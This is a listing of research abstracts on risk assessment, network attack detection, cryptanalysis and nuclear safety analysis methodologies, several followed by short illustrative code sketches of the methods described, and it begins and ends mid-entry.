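                Node("insider exfiltrates via personal device", prob=0.3),
            ]),
        ])
        print(f"overall success probability: {success_probability(tree):.3f}")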

  3. Analysis of Alternatives for Risk Assessment Methodologies and Tools

    Energy Technology Data Exchange (ETDEWEB)

    Nachtigal, Noel M. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). System Analytics; Fruetel, Julia A. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Gleason, Nathaniel J. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Helms, Jovana [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Imbro, Dennis Raymond [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Sumner, Matthew C. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis

    2013-10-01

    The purpose of this document is to provide a basic overview and understanding of risk assessment methodologies and tools from the literature and to assess the suitability of these methodologies and tools for cyber risk assessment. Sandia National Laboratories (SNL) performed this review in support of risk modeling activities performed for the Stakeholder Engagement and Cyber Infrastructure Resilience (SECIR) division of the Department of Homeland Security (DHS) Office of Cybersecurity and Communications (CS&C). The set of methodologies and tools covered in this document is not intended to be exhaustive; instead, it focuses on those that are commonly used in the risk assessment community. The classification of methodologies and tools was performed by a group of analysts with experience in risk analysis and cybersecurity, and the resulting analysis of alternatives has been tailored to address the needs of a cyber risk assessment.

  4. Identifying and tracking attacks on networks: C3I displays and related technologies

    Science.gov (United States)

    Manes, Gavin W.; Dawkins, J.; Shenoi, Sujeet; Hale, John C.

    2003-09-01

    Converged network security is extremely challenging for several reasons: expanded system and technology perimeters, unexpected feature interaction, and complex interfaces all conspire to provide hackers with greater opportunities for compromising large networks. Preventive security services and architectures are essential, but in and of themselves do not eliminate all threat of compromise. Attack management systems mitigate this residual risk by facilitating incident detection, analysis and response. There is a wealth of attack detection and response tools for IP networks, but a dearth of such tools for wireless and public telephone networks. Moreover, methodologies and formalisms have yet to be identified that can yield a common model for vulnerabilities and attacks in converged networks. A comprehensive attack management system must coordinate detection tools for converged networks, derive fully-integrated attack and network models, perform vulnerability and multi-stage attack analysis, support large-scale attack visualization, and orchestrate strategic responses to cyber attacks that cross network boundaries. We present an architecture that embodies these principles for attack management. The attack management system described engages a suite of detection tools for various networking domains, feeding real-time attack data to a comprehensive modeling, analysis and visualization subsystem. The resulting early warning system not only provides network administrators with a heads-up cockpit display of their entire network, it also supports guided response and predictive capabilities for multi-stage attacks in converged networks.

  5. JFCGuard: Detecting juice filming charging attack via processor usage analysis on smartphones

    DEFF Research Database (Denmark)

    Meng, Weizhi; Jiang, Lijun; Wang, Yu

    2017-01-01

    Smartphones have become necessities in people's lives, so many more public charging stations are being deployed worldwide to meet the increasing demand for phone charging (e.g., in airports, subways and shops). However, this situation may expose a hole for cyber-criminals to launch various attacks, especially charging attacks, and threaten users' privacy. As an example, the juice filming charging (JFC) attack is able to steal users' sensitive and private information from both Android OS and iOS devices by automatically recording the phone screen and monitoring users' inputs during the whole charging period. More importantly, this attack does not need any permission or the installation of any app on the user's side. The rationale is that users' information can be leaked through a standard micro USB connector that employs the Mobile High-Definition Link (MHL) standard. Motivated by the potential...
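
    The record does not spell out the detection algorithm, but the title suggests flagging JFC-style screen recording by watching processor load while the phone is charging. A toy sketch of that idea follows; the sampling scheme and thresholds are assumptions for illustration, not JFCGuard's actual design:

        from statistics import mean, stdev

        def charging_cpu_alert(samples, baseline, k=3.0):
            """Flag suspicious CPU load observed during a charging session.

            samples  -- CPU utilisation (%) sampled while charging
            baseline -- utilisation samples from normal idle charging
            k        -- tolerated number of standard deviations above baseline
            """
            threshold = mean(baseline) + k * stdev(baseline)
            return mean(samples) > threshold, threshold

        baseline = [2.0, 3.1, 2.5, 2.8, 3.0, 2.2]        # idle charging
        session  = [14.5, 15.2, 13.8, 16.1, 15.0, 14.2]  # load typical of screen mirroring
        alert, threshold = charging_cpu_alert(session, baseline)
        print(f"threshold={threshold:.1f}%, alert={alert}")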

  6. Diversion path analysis handbook. Volume I. Methodology

    International Nuclear Information System (INIS)

    Maltese, M.D.K.; Goodwin, K.E.; Schleter, J.C.

    1976-10-01

    Diversion Path Analysis (DPA) is a procedure for analyzing internal controls of a facility in order to identify vulnerabilities to successful diversion of material by an adversary. The internal covert threat is addressed but the results are also applicable to the external overt threat. The diversion paths are identified. Complexity parameters include records alteration or falsification, multiple removals of sub-threshold quantities, collusion, and access authorization of the individual. Indicators, or data elements and information of significance to detection of unprevented theft, are identified by means of DPA. Indicator sensitivity is developed in terms of the threshold quantity, the elapsed time between removal and indication and the degree of localization of facility area and personnel given by the indicator. Evaluation of facility internal controls in light of these sensitivities defines the capability of interrupting identified adversary action sequences related to acquisition of material at fixed sites associated with the identified potential vulnerabilities. Corrective measures can, in many cases, also be prescribed for management consideration and action. DPA theory and concepts have been developing over the last several years, and initial field testing proved both the feasibility and practicality of the procedure. Follow-on implementation testing verified the ability of facility personnel to perform DPA

  7. Large-Scale Analysis of Remote Code Injection Attacks in Android Apps

    OpenAIRE

    Choi, Hyunwoo; Kim, Yongdae

    2018-01-01

    It is pretty well known that insecure code updating procedures for Android allow remote code injection attack. However, other than codes, there are many resources in Android that have to be updated, such as temporary files, images, databases, and configurations (XML and JSON). Security of update procedures for these resources is largely unknown. This paper investigates general conditions for remote code injection attacks on these resources. Using this, we design and implement a static detecti...

  8. Analysis of Protection Measures for Naval Vessels Berthed at Harbor Against Terrorist Attacks

    Science.gov (United States)

    2016-06-01

    of discriminating neutral vessels from threats. A naval vessel berthed at harbor is more susceptible to attack than a vessel in open seas. The chances of...

  9. Advanced Power Plant Development and Analysis Methodologies

    Energy Technology Data Exchange (ETDEWEB)

    A.D. Rao; G.S. Samuelsen; F.L. Robson; B. Washom; S.G. Berenyi

    2006-06-30

    Under the sponsorship of the U.S. Department of Energy/National Energy Technology Laboratory, a multi-disciplinary team led by the Advanced Power and Energy Program of the University of California at Irvine is defining the system engineering issues associated with the integration of key components and subsystems into advanced power plant systems with goals of achieving high efficiency and minimized environmental impact while using fossil fuels. These power plant concepts include 'Zero Emission' power plants and the 'FutureGen' H2 co-production facilities. The study is broken down into three phases. Phase 1 of this study consisted of utilizing advanced technologies that are expected to be available in the 'Vision 21' time frame such as mega scale fuel cell based hybrids. Phase 2 includes current state-of-the-art technologies and those expected to be deployed in the nearer term such as advanced gas turbines and high temperature membranes for separating gas species and advanced gasifier concepts. Phase 3 includes identification of gas turbine based cycles and engine configurations suitable to coal-based gasification applications and the conceptualization of the balance of plant technology, heat integration, and the bottoming cycle for analysis in a future study. Also included in Phase 3 is the task of acquiring/providing turbo-machinery in order to gather turbo-charger performance data that may be used to verify simulation models as well as establishing system design constraints. The results of these various investigations will serve as a guide for the U. S. Department of Energy in identifying the research areas and technologies that warrant further support.

  10. Risk analysis methodologies for the transportation of radioactive materials

    International Nuclear Information System (INIS)

    Geffen, C.A.

    1983-05-01

    Different methodologies have evolved for consideration of each of the many steps required in performing a transportation risk analysis. Although there are techniques that attempt to consider the entire scope of the analysis in depth, most applications of risk assessment to the transportation of nuclear fuel cycle materials develop specific methodologies for only one or two parts of the analysis. The remaining steps are simplified for the analyst by narrowing the scope of the effort (such as evaluating risks for only one material, or a particular set of accident scenarios, or movement over a specific route); performing a qualitative rather than a quantitative analysis (probabilities may be simply ranked as high, medium or low, for instance); or assuming some generic, conservative conditions for potential release fractions and consequences. This paper presents a discussion of the history and present state-of-the-art of transportation risk analysis methodologies. Many reports in this area were reviewed as background for this presentation. The literature review, while not exhaustive, did result in a complete representation of the major methods used today in transportation risk analysis. These methodologies primarily include the use of severity categories based on historical accident data, the analysis of specifically assumed accident sequences for the transportation activity of interest, and the use of fault or event tree analysis. Although the focus of this work has generally been on potential impacts to public groups, some effort has been expended in the estimation of risks to occupational groups in transportation activities

  11. HackAttack: Game-Theoretic Analysis of Realistic Cyber Conflicts

    Energy Technology Data Exchange (ETDEWEB)

    Ferragut, Erik M [ORNL; Brady, Andrew C [Jefferson Middle School, Oak Ridge, TN; Brady, Ethan J [Oak Ridge High School, Oak Ridge, TN; Ferragut, Jacob M [Oak Ridge High School, Oak Ridge, TN; Ferragut, Nathan M [Oak Ridge High School, Oak Ridge, TN; Wildgruber, Max C [ORNL

    2016-01-01

    Game theory is appropriate for studying cyber conflict because it allows for an intelligent and goal-driven adversary. Applications of game theory have led to a number of results regarding optimal attack and defense strategies. However, the overwhelming majority of applications explore overly simplistic games, often ones in which each participant's actions are visible to every other participant. These simplifications strip away the fundamental properties of real cyber conflicts: probabilistic alerting, hidden actions, and unknown opponent capabilities. In this paper, we demonstrate that it is possible to analyze a more realistic game, one in which different resources have different weaknesses, players have different exploits, and moves occur in secrecy, but they can be detected. Certainly, more advanced and complex games are possible, but the game presented here is more realistic than any other game we know of in the scientific literature. While optimal strategies can be found for simpler games using calculus, case-by-case analysis, or, for stochastic games, Q-learning, our more complex game is more naturally analyzed using the same methods used to study other complex games, such as checkers and chess. We define a simple evaluation function and employ multi-step searches to create strategies. We show that such scenarios can be analyzed, and find that in cases of extreme uncertainty, it is often better to ignore one's opponent's possible moves. Furthermore, we show that a simple evaluation function in a complex game can lead to interesting and nuanced strategies.
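
    As a generic illustration of the approach described, an evaluation function combined with multi-step search, the sketch below shows plain depth-limited minimax against a placeholder game interface. The paper's game additionally has probabilistic detection and hidden moves, so an expectimax or sampling-based variant would be closer to the authors' setting; this only shows where the evaluation function and search fit:

        def minimax(state, depth, maximizing, game):
            """Depth-limited minimax driven by a simple evaluation function.

            `game` must provide is_terminal(state), evaluate(state),
            moves(state, maximizing) and apply(state, move); all four are
            placeholders for a concrete cyber-conflict model.
            """
            if depth == 0 or game.is_terminal(state):
                return game.evaluate(state), None
            best_move = None
            if maximizing:
                best = float("-inf")
                for move in game.moves(state, True):
                    value, _ = minimax(game.apply(state, move), depth - 1, False, game)
                    if value > best:
                        best, best_move = value, move
            else:
                best = float("inf")
                for move in game.moves(state, False):
                    value, _ = minimax(game.apply(state, move), depth - 1, True, game)
                    if value < best:
                        best, best_move = value, move
            return best, best_move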

  12. CONTENT ANALYSIS, DISCOURSE ANALYSIS, AND CONVERSATION ANALYSIS: PRELIMINARY STUDY ON CONCEPTUAL AND THEORETICAL METHODOLOGICAL DIFFERENCES

    Directory of Open Access Journals (Sweden)

    Anderson Tiago Peixoto Gonçalves

    2016-08-01

    Full Text Available This theoretical essay aims to reflect on three models of text interpretation used in qualitative research, which are often confused in their concepts and methodologies (Content Analysis, Discourse Analysis, and Conversation Analysis). After the presentation of the concepts, the essay proposes a preliminary discussion of the conceptual and theoretical methodological differences perceived between them. A review of the literature was performed to support the conceptual and theoretical methodological discussion. It could be verified that the models have differences related to the type of strategy used in the treatment of texts, the type of approach, and the corresponding theoretical position.

  13. Development of a Long Term Cooling Analysis Methodology Using RELAP5

    International Nuclear Information System (INIS)

    Lee, S. I.; Jeong, J. H.; Ban, C. H.; Oh, S. J.

    2012-01-01

    Since the revision of 10CFR50.46 in 1988, which allowed best-estimate (BE) methods in analyzing the safety performance of a nuclear power plant, safety analysis methodologies have changed continuously from conservative EM (Evaluation Model) approaches to BE ones. In this context, LSC (Long-Term core Cooling) methodologies have been reviewed by the regulatory bodies of the USA and Korea. Some non-conservatisms and deficiencies of the old methodology were identified, and as a result, the USNRC suspended the approval of CENPD-254-P-A, the old LSC methodology for CE-designed NPPs. Regulatory bodies requested that the non-conservatisms be removed and that system transient behavior be reflected in all the LSC methodologies used. In the present study, a new LSC methodology using RELAP5 is developed. RELAP5 and a newly developed code, BACON (Boric Acid Concentration Of Nuclear power plant), are used to calculate the transient behavior of the system and the boric acid concentration, respectively. The full range of the break spectrum is considered, and the applicability is confirmed through plant demonstration calculations. The results compare well with those of the old methodology; therefore, the new methodology can be applied with no significant changes to current LSC plans

  14. Complexity and Vulnerability Analysis of Critical Infrastructures: A Methodological Approach

    Directory of Open Access Journals (Sweden)

    Yongliang Deng

    2017-01-01

    Full Text Available Vulnerability analysis of network models has been widely adopted to explore the potential impacts of random disturbances, deliberate attacks, and natural disasters. However, almost all these models are based on a fixed topological structure, in which the physical properties of infrastructure components and their interrelationships are not well captured. In this paper, a new research framework is put forward to quantitatively explore and assess the complexity and vulnerability of critical infrastructure systems. Then, a case study is presented to prove the feasibility and validity of the proposed framework. After constructing the metro physical network (MPN), Pajek is employed to analyze its corresponding topological properties, including degree, betweenness, average path length, network diameter, and clustering coefficient. A comprehensive understanding of the complexity of the MPN helps the metro system restrain near-misses or accidents at their origin and supports decision-making in emergency situations. Moreover, through the analysis of two simulation protocols for system component failure, it is found that the MPN turns out to be vulnerable when high-degree nodes or high-betweenness edges are attacked. These findings are conducive to offering recommendations and proposals for robust design, risk-based decision-making, and prioritization of risk reduction investment.
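
    A compact sketch of the kind of topological and attack-simulation analysis described, run with networkx on a toy graph rather than on the actual metro network in Pajek:

        import networkx as nx

        # Toy stand-in for a metro physical network: nodes are stations, edges are track links
        G = nx.Graph([("A", "B"), ("B", "C"), ("C", "D"), ("B", "E"), ("E", "D"), ("D", "F")])

        print("degree:", dict(G.degree()))
        print("betweenness:", nx.betweenness_centrality(G))
        print("average path length:", nx.average_shortest_path_length(G))
        print("diameter:", nx.diameter(G))
        print("clustering coefficient:", nx.average_clustering(G))

        # Targeted attack: remove the highest-degree node and measure fragmentation
        target = max(G.degree(), key=lambda kv: kv[1])[0]
        H = G.copy()
        H.remove_node(target)
        largest = max(nx.connected_components(H), key=len)
        print(f"after removing {target}: largest component keeps "
              f"{len(largest)} of {G.number_of_nodes()} stations")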

  15. Safety analysis and evaluation methodology for fusion systems

    International Nuclear Information System (INIS)

    Fujii-e, Y.; Kozawa, Y.; Namba, C.

    1987-03-01

    Fusion systems, which are under development as future energy systems, have reached a stage at which break-even is expected to be realized in the near future. It is desirable to demonstrate that fusion systems are well accepted by the societal environment. There are three crucial viewpoints for measuring this acceptability: technological feasibility, economy and safety. These three points are closely interrelated. The safety problem has become more important since the three large-scale tokamaks, JET, TFTR and JT-60, started experiments, and tritium will be introduced into some of them as the fusion fuel. It is desirable to establish a methodology that resolves the safety-related issues in harmony with the technological evolution. The most promising fusion system for reactors is not yet settled. This study has the objective of developing an adequate methodology that promotes the safety design of general fusion systems and of presenting a basis for proposing R and D themes and establishing the database. A framework of the methodology, the understanding and modeling of fusion systems, the principle of ensuring safety, the safety analysis based on function, and the application of the methodology are discussed. As a result of this study, the methodology for the safety analysis and evaluation of fusion systems was developed. New ideas and approaches were presented in the course of the methodology development. (Kako, I.)

  16. Incorporation of advanced accident analysis methodology into safety analysis reports

    International Nuclear Information System (INIS)

    2003-05-01

    as structural analysis codes and computational fluid dynamics (CFD) codes are applied. The initial code development took place in the sixties and seventies and resulted in a set of quite conservative codes for reactor dynamics, thermal-hydraulics and containment analysis. The most important limitations of these codes came from insufficient knowledge of the physical phenomena and from limited computer memory and speed. Very significant advances have been made in the development of the code systems during the last twenty years in all of the above areas. If the data for the physical models of the code are sufficiently well established and allow quite a realistic analysis, these newer versions are called advanced codes. The assumptions used in the deterministic safety analysis vary from very pessimistic to realistic assumptions. In the accident analysis terminology, it is customary to call the pessimistic assumptions 'conservative' and the realistic assumptions 'best estimate'. The assumptions can refer to the selection of physical models, the introduction of these models into the code, and the initial and boundary conditions including the performance and failures of the equipment and human action. The advanced methodology in the present report means the application of advanced codes (or best estimate codes), which sometimes represent a combination of various advanced codes for separate stages of the analysis, and in some cases in combination with experiments. Safety Analysis Reports are required to be available before and during the operation of the plant in most countries. The contents, scope and stages of the SAR vary among the countries. The guide applied in the USA, i.e. Regulatory Guide 1.70, is representative of the way in which SARs are prepared in many countries. During the design phase, a preliminary safety analysis report (PSAR) is requested in many countries and the final safety analysis report (FSAR) is required for the operating licence. There is

  17. Methodology for flood risk analysis for nuclear power plants

    International Nuclear Information System (INIS)

    Wagner, D.P.; Casada, M.L.; Fussell, J.B.

    1984-01-01

    The methodology for flood risk analysis described here addresses the effects of a flood on nuclear power plant safety systems. Combining the results of this method with the probability of a flood allows the effects of flooding to be included in a probabilistic risk assessment. The five-step methodology includes accident sequence screening to focus the detailed analysis efforts on the accident sequences that are significantly affected by a flood event. The quantitative results include the flood's contribution to system failure probability, accident sequence occurrence frequency and consequence category occurrence frequency. The analysis can be added to existing risk assessments without a significant loss in efficiency. The results of two example applications show the usefulness of the methodology. Both examples rely on the Reactor Safety Study for the required risk assessment inputs and present changes in the Reactor Safety Study results as a function of flood probability
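
    To make the combination step concrete, here is a minimal, purely illustrative calculation of how a flood's conditional contribution could be folded into an accident-sequence frequency; the numbers are invented and are not taken from the Reactor Safety Study:

        # Illustrative values (per reactor-year)
        flood_frequency        = 1.0e-3   # frequency of the flood event
        p_seq_given_flood      = 5.0e-2   # conditional probability of the accident sequence given the flood
        baseline_seq_frequency = 2.0e-6   # sequence frequency from internal events alone

        flood_contribution = flood_frequency * p_seq_given_flood
        total = baseline_seq_frequency + flood_contribution

        print(f"flood contribution: {flood_contribution:.2e} /yr")
        print(f"total sequence frequency: {total:.2e} /yr "
              f"({flood_contribution / total:.0%} from flooding)")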

  18. Heart Attack

    Science.gov (United States)

    ... properly causes your body's blood sugar levels to rise, increasing your risk of heart attack. Metabolic syndrome. This occurs when you have obesity, high blood pressure and high blood sugar. Having metabolic ...

  19. Heart Attack

    Science.gov (United States)

    ... family history of heart attack race – African Americans, Mexican Americans, Native Americans, and native Hawaiians are at ... Your doctor will prescribe the medicines that are right for you. If you have had a heart ...

  20. Simplified methodology for analysis of Angra-1 containment

    International Nuclear Information System (INIS)

    Neves Conti, T. das; Souza, A.L. de; Sabundjian, G.

    1988-01-01

    A simplified analysis methodology was developed to simulate a Large Break Loss of Coolant Accident in the Angra 1 Nuclear Power Station. Using the RELAP5/MOD1, RELAP4/MOD5 and CONTEMPT-LT codes, the time variation of pressure and temperature in the containment was analysed. The obtained data were compared with the Angra 1 Final Safety Analysis Report and with those calculated by a detailed model. The results obtained with this new methodology, together with the small computational simulation time, were satisfactory for a preliminary evaluation of the Angra 1 global parameters. (author) [pt

  1. Methodological developments and applications of neutron activation analysis

    International Nuclear Information System (INIS)

    Kucera, J.

    2007-01-01

    The paper reviews the author's experience acquired and achievements made in methodological developments of neutron activation analysis (NAA) of mostly biological materials. These involve epithermal neutron activation analysis, radiochemical neutron activation analysis using both single- and multi-element separation procedures, use of various counting modes, and the development and use of the self-verification principle. The role of NAA in the detection of analytical errors is discussed and examples of applications of the procedures developed are given. (author)

  2. PIXE methodology of rare earth element analysis and its applications

    International Nuclear Information System (INIS)

    Ma Xinpei

    1992-01-01

    The Proton Induced X-ray Emission (PIXE) methodology for rare earth element (REE) analysis is discussed, including the significance of REE analysis, the principle of PIXE applied to REEs, the selection of characteristic X-rays for lanthanide-series elements, the deconvolution of highly overlapped PIXE spectra, and the minimum detection limit (MDL) of REEs. Some practical applications are presented, and the special features of PIXE analysis of high-purity REE chemicals are discussed. (author)

  3. Development of seismic risk analysis methodologies at JAERI

    International Nuclear Information System (INIS)

    Tanaka, T.; Abe, K.; Ebisawa, K.; Oikawa, T.

    1988-01-01

    The usefulness of probabilistic safety assessment (PSA) is recognized worldwide for balanced design and regulation of nuclear power plants. In Japan, the Japan Atomic Energy Research Institute (JAERI) has been engaged in developing methodologies necessary for carrying out PSA. The research and development program was started in 1980. In those days the effort covered only internal-initiator PSA. In 1985 the program was expanded so as to include external event analysis. Although this expanded program is to cover various external initiators, the current effort is dedicated to seismic risk analysis. There are three levels of seismic PSA, similar to internal-initiator PSA: Level 1: Evaluation of core damage frequency, Level 2: Evaluation of radioactive release frequency and source terms, and Level 3: Evaluation of environmental consequences. In the JAERI program, only the methodologies for Level 1 seismic PSA are under development. The methodology development for seismic risk analysis is divided into two phases. The Phase I study is to establish a whole set of simple methodologies based on currently available data. In Phase II, a sensitivity study will be carried out to identify the parameters whose uncertainty may result in large uncertainty in seismic risk, and for such parameters, the methodology will be upgraded. Now the Phase I study has almost been completed. In this report, outlines of the study and some of its outcomes are described

  4. Security Analysis of 7-Round MISTY1 against Higher Order Differential Attacks

    Science.gov (United States)

    Tsunoo, Yukiyasu; Saito, Teruo; Shigeri, Maki; Kawabata, Takeshi

    MISTY1 is a 64-bit block cipher that has provable security against differential and linear cryptanalysis. MISTY1 is one of the algorithms selected in the European NESSIE project, and it has been recommended for Japanese e-Government ciphers by the CRYPTREC project. This paper shows that higher order differential attacks can be successful against 7-round versions of MISTY1 with FL functions. The attack on 7-round MISTY1 can recover a partial subkey with a data complexity of 2^54.1 and a computational complexity of 2^120.8, which signifies the first successful attack on 7-round MISTY1 with no limitation such as a weak key. This paper also evaluates the complexity of this higher order differential attack on MISTY1 in which the key schedule is replaced by a pseudorandom function. It is shown that resistance to the higher order differential attack is not substantially improved even in 7-round MISTY1 in which the key schedule is replaced by a pseudorandom function.
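
    A toy demonstration of the higher-order differential idea, not of the MISTY1 attack itself: the d-th order derivative of a function is the XOR of its outputs over a coset spanned by d linearly independent input differences, and it vanishes whenever d exceeds the function's algebraic degree.

        from itertools import combinations
        from functools import reduce

        def f(x):
            # Toy round function: each output bit is a product of two input bits,
            # so its algebraic degree over GF(2) is 2.
            return (x & (x >> 1)) & 0xFF

        def derivative(func, x, diffs):
            # XOR of func over the coset x + span(diffs); diffs must be linearly independent.
            total = 0
            for r in range(len(diffs) + 1):
                for subset in combinations(diffs, r):
                    offset = reduce(lambda a, b: a ^ b, subset, 0)
                    total ^= func(x ^ offset)
            return total

        print(derivative(f, 0x00, [0x01, 0x02]))         # second order: generally non-zero
        print(all(derivative(f, x, [0x01, 0x02, 0x04]) == 0
                  for x in range(256)))                  # third order: always zero for degree 2

    In a key-recovery attack such a forced-zero sum is evaluated under guessed last-round subkeys and wrong guesses are discarded; the 2^54.1 data and 2^120.8 time figures quoted above are the cost of doing this against 7-round MISTY1.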

  5. Proactive Routing Mutation Against Stealthy Distributed Denial of Service Attacks – Metrics, Modeling and Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Duan, Qi; Al-Shaer, Ehab; Chatterjee, Samrat; Halappanavar, Mahantesh; Oehmen, Christopher S.

    2018-04-01

    The Infrastructure Distributed Denial of Service (IDDoS) attacks continue to be one of the most devastating challenges facing cyber systems. The new generation of IDDoS attacks exploit the inherent weakness of cyber infrastructure including deterministic nature of routes, skew distribution of flows, and Internet ossification to discover the network critical links and launch highly stealthy flooding attacks that are not observable at the victim end. In this paper, first, we propose a new metric to quantitatively measure the potential susceptibility of any arbitrary target server or domain to stealthy IDDoS attacks, and estimate the impact of such susceptibility on enterprises. Second, we develop a proactive route mutation technique to minimize the susceptibility to these attacks by dynamically changing the flow paths periodically to invalidate the adversary knowledge about the network and avoid targeted critical links. Our proposed approach actively changes these network paths while satisfying security and quality of service requirements. We present an integrated approach of proactive route mutation that combines both infrastructure-based mutation that is based on reconfiguration of switches and routers, and middle-box approach that uses an overlay of end-point proxies to construct a virtual network path free of critical links to reach a destination. We implemented the proactive path mutation technique on a Software Defined Network using the OpenDaylight controller to demonstrate a feasible deployment of this approach. Our evaluation validates the correctness, effectiveness, and scalability of the proposed approaches.
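
    A simplified sketch of the infrastructure-based mutation idea (illustrative only; the paper's implementation runs on an SDN testbed with the OpenDaylight controller): periodically recompute a flow path that penalises links with high betweenness, so no single critical link stays on the path for long.

        import random
        import networkx as nx

        def mutated_path(G, src, dst, penalty=10.0, jitter=2.0, rng=random):
            """Pick a new src->dst path, steering away from high-betweenness links."""
            eb = nx.edge_betweenness_centrality(G)
            for u, v in G.edges():
                # Penalise critical links and add jitter so the chosen path varies per epoch
                G[u][v]["w"] = 1.0 + penalty * eb[(u, v)] + rng.uniform(0.0, jitter)
            return nx.shortest_path(G, src, dst, weight="w")

        G = nx.cycle_graph(6)      # toy topology with redundant paths
        G.add_edge(0, 3)           # a tempting shortcut, i.e. a potential critical link
        for epoch in range(3):     # one recomputation per (hypothetical) mutation interval
            print(f"epoch {epoch}: path {mutated_path(G, 0, 3)}")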

  6. A Global Sensitivity Analysis Methodology for Multi-physics Applications

    Energy Technology Data Exchange (ETDEWEB)

    Tong, C H; Graziani, F R

    2007-02-02

    Experiments are conducted to draw inferences about an entire ensemble based on a selected number of observations. This applies to both physical experiments as well as computer experiments, the latter of which are performed by running the simulation models at different input configurations and analyzing the output responses. Computer experiments are instrumental in enabling model analyses such as uncertainty quantification and sensitivity analysis. This report focuses on a global sensitivity analysis methodology that relies on a divide-and-conquer strategy and uses intelligent computer experiments. The objective is to assess qualitatively and/or quantitatively how the variabilities of simulation output responses can be accounted for by input variabilities. We address global sensitivity analysis in three aspects: methodology, sampling/analysis strategies, and an implementation framework. The methodology consists of three major steps: (1) construct credible input ranges; (2) perform a parameter screening study; and (3) perform a quantitative sensitivity analysis on a reduced set of parameters. Once identified, research effort should be directed to the most sensitive parameters to reduce their uncertainty bounds. This process is repeated with tightened uncertainty bounds for the sensitive parameters until the output uncertainties become acceptable. To accommodate the needs of multi-physics application, this methodology should be recursively applied to individual physics modules. The methodology is also distinguished by an efficient technique for computing parameter interactions. Details for each step will be given using simple examples. Numerical results on large scale multi-physics applications will be available in another report. Computational techniques targeted for this methodology have been implemented in a software package called PSUADE.
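
    A minimal sketch of the screening step (step 2 above), using crude one-at-a-time elementary effects on a stand-in model; the PSUADE package referred to in the record provides far more than this, the code only shows the shape of the computation:

        import numpy as np

        def model(x):
            # Stand-in simulation: strongly sensitive to x0, weakly to x1, not at all to x2
            return 4.0 * x[0] ** 2 + 0.5 * x[1] + 0.0 * x[2]

        def elementary_effects(model, bounds, n_points=50, delta=0.05, seed=0):
            """Morris-style screening: mean absolute elementary effect per input."""
            rng = np.random.default_rng(seed)
            lo, hi = bounds[:, 0], bounds[:, 1]
            effects = np.zeros(len(bounds))
            for _ in range(n_points):
                x = lo + rng.random(len(bounds)) * (hi - lo)
                y0 = model(x)
                for i in range(len(bounds)):
                    xp = x.copy()
                    xp[i] += delta * (hi[i] - lo[i])
                    effects[i] += abs(model(xp) - y0) / delta
            return effects / n_points

        bounds = np.array([[0.0, 1.0]] * 3)
        print("mean |elementary effect| per input:", elementary_effects(model, bounds))

    Inputs with small mean effects would be frozen at nominal values, and the quantitative analysis of step 3 would then be run only over the remaining sensitive parameters.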

  7. Experiment Analysis of Concrete’s Mechanical Property Deterioration Suffered Sulfate Attack and Drying-Wetting Cycles

    Directory of Open Access Journals (Sweden)

    Wei Tian

    2017-01-01

    Full Text Available The mechanism of concrete deterioration in sodium sulfate solution is investigated. The macroperformance was characterized via its apparent properties, mass loss, and compressive strength. Changes in ions in the solution at different sulfate attack periods were tested by inductively coupled plasma (ICP. The damage evolution law, as well as analysis of the concrete’s meso- and microstructure, was revealed by scanning electron microscope (SEM and computed tomography (CT scanning equipment. The results show that the characteristics of concrete differed at each sulfate attack period; the drying-wetting cycles generally accelerated the deterioration process of concrete. In the early sulfate attack period, the pore structure of the concrete was filled with sulfate attack products (e.g., ettringite and gypsum, and its mass and strength increased. The pore size and porosity decreased while the CT number increased. As deterioration progressed, the swelling/expansion force of products and the salt crystallization pressure of sulfate crystals acted on the inner wall of the concrete to accumulate damage and accelerate deterioration. The mass and strength of concrete sharply decreased. The number and volume of pores increased, and the pore grew more quickly resulting in initiation and expansion of microcracks while the CT number decreased.

  8. Taipower's transient analysis methodology for pressurized water reactors

    International Nuclear Information System (INIS)

    Huang, Pinghue

    1998-01-01

    The methodology presented in this paper is a part of 'Taipower's Reload Design and Transient Analysis Methodologies for Light Water Reactors' developed by the Taiwan Power Company (TPC) and the Institute of Nuclear Energy Research. This methodology utilizes four computer codes developed or sponsored by the Electric Power Research Institute: the system transient analysis code RETRAN-02, the core thermal-hydraulic analysis code COBRAIIIC, the three-dimensional spatial kinetics code ARROTTA, and the fuel rod evaluation code FREY. Each of the computer codes was extensively validated. Analysis methods and modeling techniques were conservatively established for each application using a systematic evaluation with the assistance of sensitivity studies. The qualification results and analysis methods were documented in detail in TPC topical reports. The topical reports for COBRAIIIC, ARROTTA, and FREY have been reviewed and approved by the Atomic Energy Council (AEC). TPC's in-house transient methodology has been successfully applied to provide valuable support for many operational issues and plant improvements for TPC's Maanshan Units 1 and 2. Major applications include the removal of the resistance temperature detector bypass system, the relaxation of the hot-full-power moderator temperature coefficient design criteria imposed by the ROCAEC due to a concern about Anticipated Transient Without Scram, the reduction of the boron injection tank concentration and the elimination of the heat tracing, and the reduction of reactor coolant system flow. (author)

  9. A methodology to incorporate organizational factors into human reliability analysis

    International Nuclear Information System (INIS)

    Li Pengcheng; Chen Guohua; Zhang Li; Xiao Dongsheng

    2010-01-01

    A new holistic methodology for Human Reliability Analysis (HRA) is proposed to model the effects of organizational factors on human reliability. Firstly, a conceptual framework is built, which is used to analyze the causal relationships between the organizational factors and human reliability. Then, the inference model for Human Reliability Analysis is built by combining the conceptual framework with Bayesian networks, which is used to execute the causal inference and diagnostic inference of human reliability. Finally, a case example is presented to demonstrate the specific application of the proposed methodology. The results show that the proposed methodology of combining the conceptual model with Bayesian networks not only easily models the causal relationship between organizational factors and human reliability, but also, in a given context, allows the human operational reliability to be measured quantitatively and the most likely root causes of human error to be identified and prioritized. (authors)
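
    A hand-rolled miniature of the inference idea, with one organizational factor influencing human error and invented numbers, showing the causal direction P(error) and the diagnostic direction P(factor | error) via Bayes' rule rather than a full Bayesian-network engine:

        # Prior on the organizational factor "training programme is deficient" (invented)
        p_deficient = 0.2

        # Conditional probability of human error given the factor state (invented)
        p_error_given = {"deficient": 0.15, "adequate": 0.02}

        # Causal inference: marginal probability of a human error
        p_error = (p_error_given["deficient"] * p_deficient
                   + p_error_given["adequate"] * (1.0 - p_deficient))

        # Diagnostic inference: given an error occurred, how likely is deficient training?
        p_deficient_given_error = p_error_given["deficient"] * p_deficient / p_error

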